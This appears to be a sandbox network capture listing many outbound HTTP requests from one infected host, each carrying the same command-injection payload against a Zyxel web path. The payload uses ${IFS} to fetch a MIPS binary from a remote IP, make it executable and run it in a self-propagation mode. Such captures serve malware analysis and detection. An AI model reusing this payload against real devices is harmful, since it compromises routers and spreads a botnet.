                                                Jan 29, 2024 07:07:47.325510979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4166192.168.2.2358158162.254.5.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325526953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4167192.168.2.234102679.193.110.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325571060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4168192.168.2.235160250.220.153.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325601101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4169192.168.2.2346184119.141.24.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325656891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4170192.168.2.2341948108.206.12.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325709105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4171192.168.2.2332940171.178.84.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325747967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4172192.168.2.2345780194.158.157.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325800896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4173192.168.2.2353562206.95.34.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325826883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4174192.168.2.2355710182.116.159.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325880051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4175192.168.2.2348498122.101.138.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.325978041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4176192.168.2.235472683.243.2.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326001883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4177192.168.2.233988495.88.38.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326069117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4178192.168.2.235465627.106.2.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326102972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4179192.168.2.235668031.22.77.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326141119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4180192.168.2.234330272.137.116.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326144934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4181192.168.2.2341228138.26.247.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326178074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4182192.168.2.234482820.165.128.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326208115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4183192.168.2.2342078153.246.138.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326289892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4184192.168.2.2346720125.173.228.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326332092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4185192.168.2.2345422110.5.55.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326334953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4186192.168.2.2343706107.223.195.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326378107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4187192.168.2.234745076.151.113.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326431990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4188192.168.2.2339604149.171.240.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326481104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4189192.168.2.2360050175.167.53.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326513052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4190192.168.2.2349900142.254.213.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326540947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4191192.168.2.234769643.209.13.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326572895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192192.168.2.2344724112.113.166.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326611996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4193192.168.2.2359350117.111.36.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326643944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4194192.168.2.233658287.53.249.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326690912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4195192.168.2.2339448158.199.150.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326699972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4196192.168.2.2341434126.93.62.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326739073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4197192.168.2.2341050200.77.2.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326786995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4198192.168.2.2349290211.205.159.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326814890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4199192.168.2.234139258.134.65.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326841116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4200192.168.2.23458048.221.2.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326874018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4201192.168.2.235306292.31.249.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326927900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4202192.168.2.235263612.25.75.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326944113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4203192.168.2.2352422121.130.246.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.326997995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4204192.168.2.234666249.121.175.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327017069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4205192.168.2.235042837.235.172.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327068090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4206192.168.2.2339788133.167.37.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327100992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4207192.168.2.2340102106.135.216.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327157021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4208192.168.2.2360640149.99.120.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327193022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4209192.168.2.2353508155.216.66.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327225924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4210192.168.2.2334542203.231.51.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327258110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4211192.168.2.234309873.135.51.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327333927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4212192.168.2.235278089.81.248.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327333927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4213192.168.2.233839062.15.242.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327409029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4214192.168.2.2357238193.58.205.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327433109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4215192.168.2.2335482164.209.231.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327497959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4216192.168.2.2355506102.217.131.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327502012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4217192.168.2.2339436213.0.165.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327538013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4218192.168.2.233883084.77.25.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327594995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4219192.168.2.2343324186.179.27.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327636003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4220192.168.2.234103489.50.232.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327677011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4221192.168.2.2346186172.50.10.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327714920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4222192.168.2.2360550200.41.53.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327789068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4223192.168.2.233641275.78.222.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327824116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4224192.168.2.234777466.22.173.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327831030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4225192.168.2.2336236130.167.219.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.327893019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4226192.168.2.2358312193.102.177.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340080976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4227192.168.2.2347402204.6.214.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340203047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4228192.168.2.2358914205.233.44.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340250015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4229192.168.2.236019891.116.236.113443
                                                TimestampBytes transferredDirectionData
